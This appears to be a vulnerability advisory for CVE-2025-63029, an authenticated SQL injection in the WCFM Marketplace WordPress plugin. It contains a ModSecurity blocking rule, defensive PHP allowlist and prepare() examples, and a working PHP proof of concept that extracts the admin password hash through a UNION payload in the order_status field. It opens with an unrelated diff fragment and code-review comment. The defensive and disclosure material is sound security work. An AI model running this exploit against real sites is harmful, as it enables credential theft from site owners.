-		$withdrawal_charge_stripe        = isset( $vendor_withdrawal_charge['stripe'] ) ? $vendor_withdrawal_charge['stripe'] : array();
-		$withdrawal_charge_skrill        = isset( $vendor_withdrawal_charge['skrill'] ) ? $vendor_withdrawal_charge['skrill'] : array();
-		$withdrawal_charge_bank_transfer = isset( $vendor_withdrawal_charge['bank_transfer'] ) ? $vendor_withdrawal_charge['bank_transfer'] : array();
-
-		// Transactional Charge
-		$wcfm_transaction_options = array( 'global' => __( 'By Global Rule', 'wc-multivendor-marketplace' ), 'vendor' => __( 'Vendor Specific Rule', 'wc-multivendor-marketplace' ) );
-
-		$active_order_payment_methods    = get_wcfm_marketplace_disallow_order_payment_methods();
-		$vendor_transaction_mode         = isset( $vendor_data['withdrawal']['tra
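Review bot: the map-library fallback assigns a value the very next condition never accepts: `elseif( !$wcfm_map_lib && !$api_key ) { $wcfm_map_lib = 'leaftlet'; }` is immediately followed by the check `($wcfm_map_lib == 'leaflet')`, so with no Google API key and no explicitly chosen library the whole Store Location block is silently skipped; the default should be spelled `'leaflet'`. A second point in the same region: `var selected_state = '<?php echo esc_attr($state); ?>';` escapes for an HTML attribute context, but the value is emitted inside a JavaScript string literal, where `esc_js()` is the context-appropriate escaper.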

ModSecurity Protection Against This CVE

Below is our ModSecurity-compatible rule for this CVE. It is a chained rule, so a request is denied only when the request path, the AJAX action and the `order_status` value all match.

ModSecurity
# Chained rule: all three SecRule directives must match before the request is denied.
# REQUEST_FILENAME is the path without any query string, so a trailing "?x=y" cannot
# make the match fail the way it would with REQUEST_URI and @streq.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
  "id:20263001,phase:2,deny,status:403,log,chain,msg:'CVE-2025-63029 via WCFM Marketplace AJAX - SQL Injection',severity:CRITICAL,tag:'CVE-2025-63029'"
  SecRule ARGS_POST:action "@streq wcfm_vendor_order_status_change" \
    "chain"
  # Transformations run in the order listed: decode first, then lowercase. The pattern
  # is therefore written in lowercase; an uppercase UNION would never match after t:lowercase.
  SecRule ARGS_POST:order_status "@rx (?:'\s*union|'\s*or|'\s*and|--|#|;)" \
    "t:urlDecode,t:removeNulls,t:lowercase"
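The rule above stops the request at the edge; the durable fix belongs in the plugin, where the caller's order status must never be concatenated into SQL the way `$status` is in the vulnerable `wcfmmp_vendor_order_status_condition`. The following PHP is an added illustration, not the WCFM plugin's code or its 3.7.2 patch: statuses are validated against an allowlist and emitted only as `%s` placeholders plus bound values for `$wpdb->prepare()`. The function names `wcfmmp_safe_order_status_condition` and `wcfmmp_normalize_order_status`, the `ALLOWED_ORDER_STATUSES` constant and the sample inputs are assumptions made for the example.

```php
<?php
// Added illustration for this CVE, not the WCFM plugin's code or its 3.7.2 patch.
// Idea: the caller-supplied order status never becomes SQL text. It is checked
// against an allowlist and emitted only as %s placeholders plus bound values,
// which inside WordPress go through $wpdb->prepare().

// Assumed allowlist. Inside WordPress this would be array_keys( wc_get_order_statuses() );
// it is hard-coded here so the script runs on its own with plain `php`.
const ALLOWED_ORDER_STATUSES = [
    'wc-pending', 'wc-processing', 'wc-on-hold', 'wc-completed',
    'wc-cancelled', 'wc-refunded', 'wc-failed',
];

/**
 * Normalise a single raw status ("Completed" -> "wc-completed") and return it
 * only if it is on the allowlist; anything else, including an injection string,
 * yields null.
 */
function wcfmmp_normalize_order_status(string $raw): ?string
{
    $status = strtolower(trim($raw));
    if (strpos($status, 'wc-') !== 0) {
        $status = 'wc-' . $status;
    }
    return in_array($status, ALLOWED_ORDER_STATUSES, true) ? $status : null;
}

/**
 * Hypothetical safe counterpart of wcfmmp_vendor_order_status_condition().
 *
 * @param string|string[] $status  one status or a list, exactly as received from the request
 * @param string          $column  column to filter on; fixed by the calling code, never by the request
 * @return array{sql: string, args: string[]}  placeholder fragment plus the values to bind;
 *         an empty fragment when no valid status remains, so a tampered filter filters nothing
 */
function wcfmmp_safe_order_status_condition($status, string $column = 'order_status'): array
{
    // Identifiers cannot be bound with placeholders, so the column name is allowlisted by shape.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $column)) {
        throw new InvalidArgumentException('invalid column name');
    }

    $valid = [];
    foreach ((array) $status as $raw) {
        $clean = is_string($raw) ? wcfmmp_normalize_order_status($raw) : null;
        if ($clean !== null) {
            $valid[$clean] = true; // keyed by value, so duplicates collapse
        }
    }
    if ($valid === []) {
        return ['sql' => '', 'args' => []];
    }

    $args = array_keys($valid);
    $placeholders = implode(', ', array_fill(0, count($args), '%s'));
    // The fragment holds no request data at all; only the %s markers are filled later.
    return ['sql' => " AND `{$column}` IN ({$placeholders})", 'args' => $args];
}

// Demonstration on constructed inputs (run with: php this_file.php).
$cases = [
    'legitimate filter' => ['completed', 'processing'],
    'tampered filter'   => ["' UNION SELECT 1 -- ", 'completed'],
    'unknown status'    => ['wc-made-up'],
];
foreach ($cases as $label => $input) {
    $cond = wcfmmp_safe_order_status_condition($input);
    printf("%-18s sql=%-48s args=%s\n", $label, var_export($cond['sql'], true), json_encode($cond['args']));
}
// Inside WordPress the pieces would be combined like this (table name is a placeholder):
//   $sql = $wpdb->prepare(
//       "SELECT * FROM <orders_table> WHERE vendor_id = %d" . $cond['sql'],
//       array_merge([$vendor_id], $cond['args'])
//   );
```

The tampered input is dropped by the allowlist before any SQL is built, and the surviving value reaches the database only as a bound argument.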

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-63029 - WCFM Marketplace – Multivendor Marketplace for WooCommerce <= 3.7.1 - Authenticated (Store vendor+) SQL Injection

$target_url = 'http://example.com/wp-admin/admin-ajax.php'; // Change this to the target site
$vendor_username = 'attacker_vendor';  // Change to valid vendor credentials
$vendor_password = 'vendor_password'; // Change to valid vendor credentials

// Step 1: Authenticate as a store vendor
$login_url = 'http://example.com/wp-login.php';
$login_data = array(
    'log' => $vendor_username,
    'pwd' => $vendor_password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);

// Step 2: Craft the SQL injection payload in the 'order_status' parameter
// The vulnerable function wcfmmp_vendor_order_status_condition concatenates $status directly
// By injecting a UNION statement, we can extract data (e.g., admin's user_pass)
$payload = "' UNION SELECT user_pass FROM wp_users WHERE user_login='admin' -- ";

// Simulate an AJAX request that triggers the vulnerable functionality
$ajax_action = 'wcfm_vendor_order_status_change'; // Example action; adjust based on real endpoint
$post_data = array(
    'action' => $ajax_action,
    'order_status' => $payload,
    'order_id' => 1 // Arbitrary order ID
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
if (curl_errno($ch)) {
    echo 'Error: ' . curl_error($ch) . "\n";
} else {
    echo 'Response: ' . $response . "\n";
    // The response may contain the extracted password hash
}
curl_close($ch);

// Clean up cookie file
unlink('/tmp/cookies.txt');
?>
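As an added defender-side illustration (not WCFM Marketplace code and not the vendor's actual patch), the following stand-alone PHP places the direct-concatenation pattern the PoC relies on beside a hardened version that validates `order_status` against an allowlist and then binds it with `$wpdb->prepare()`. `FakeWpdb`, both function names, and the status list (WooCommerce's default order status slugs) are assumptions so that the script runs outside WordPress; the plugin's real status list and function signatures may differ.

```php
<?php
// Added illustration, not WCFM Marketplace code: the direct-concatenation
// pattern beside a hardened allowlist + prepare() version. FakeWpdb stands in
// for WordPress's $wpdb so this runs from the command line.

class FakeWpdb {
    // Emulates wpdb::prepare() for %s placeholders only: each argument is
    // escaped and single-quoted, so a value can never close the SQL literal.
    public function prepare(string $query, ...$args): string {
        $quoted = array_map(
            static fn($a): string => "'" . addslashes((string) $a) . "'",
            $args
        );
        return vsprintf($query, $quoted);
    }
}

// WooCommerce's default order status slugs, used here as the allowlist
// (an assumption; the plugin's own list may differ). The point is that only
// known values ever reach the query.
const ALLOWED_ORDER_STATUSES = [
    'wc-pending', 'wc-processing', 'wc-on-hold', 'wc-completed',
    'wc-cancelled', 'wc-refunded', 'wc-failed',
];

// The flawed pattern described in the analysis: $status comes from the request
// and is spliced straight into the SQL text.
function vulnerable_order_status_condition(string $status): string {
    return " AND order_status = '" . $status . "'";
}

// Hardened version (hypothetical name). Returns null when nothing in the
// request is a known status, so the caller can refuse the filter rather than
// fall back to an unfiltered query.
function safe_order_status_condition(FakeWpdb $wpdb, $status): ?string {
    $requested = is_array($status) ? $status : [$status];
    // 1. Allowlist: drop anything that is not a known status. Unknown input is
    //    never echoed into SQL, which removes the injection surface entirely.
    $valid = array_values(array_intersect(
        array_map('strval', array_filter($requested, 'is_scalar')),
        ALLOWED_ORDER_STATUSES
    ));
    if ($valid === []) {
        return null;
    }
    // 2. Defence in depth: even allowlisted values are bound through prepare(),
    //    with one placeholder per value for the IN (...) list.
    $placeholders = implode(', ', array_fill(0, count($valid), '%s'));
    return $wpdb->prepare(" AND order_status IN ($placeholders)", ...$valid);
}

$wpdb = new FakeWpdb();
// The order_status value from the proof of concept above, reused as test input.
$payload = "' UNION SELECT user_pass FROM wp_users WHERE user_login='admin' -- ";

// Vulnerable: the quote in the payload closes the literal and the rest becomes SQL.
echo "vulnerable:         " . vulnerable_order_status_condition($payload) . PHP_EOL;
// Hardened: the payload is not an allowed status and is rejected before any SQL is built.
echo "hardened (payload): " . var_export(safe_order_status_condition($wpdb, $payload), true) . PHP_EOL;
// Hardened: a legitimate filter request still yields a usable, parameterised condition.
echo "hardened (valid):   " . safe_order_status_condition($wpdb, ['wc-completed', 'wc-processing']) . PHP_EOL;
```

Run it with `php` from the command line. The allowlist is what closes the hole: a value that is not a known status never reaches string building at all, and the `prepare()` binding is kept as a second layer so that a future change to the list (or a status slug containing a quote) still cannot alter the query's structure. Escaping alone, without the allowlist, would be the weaker of the two fixes the analysis mentions, because it leaves the query shape dependent on correctly escaping every input path.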
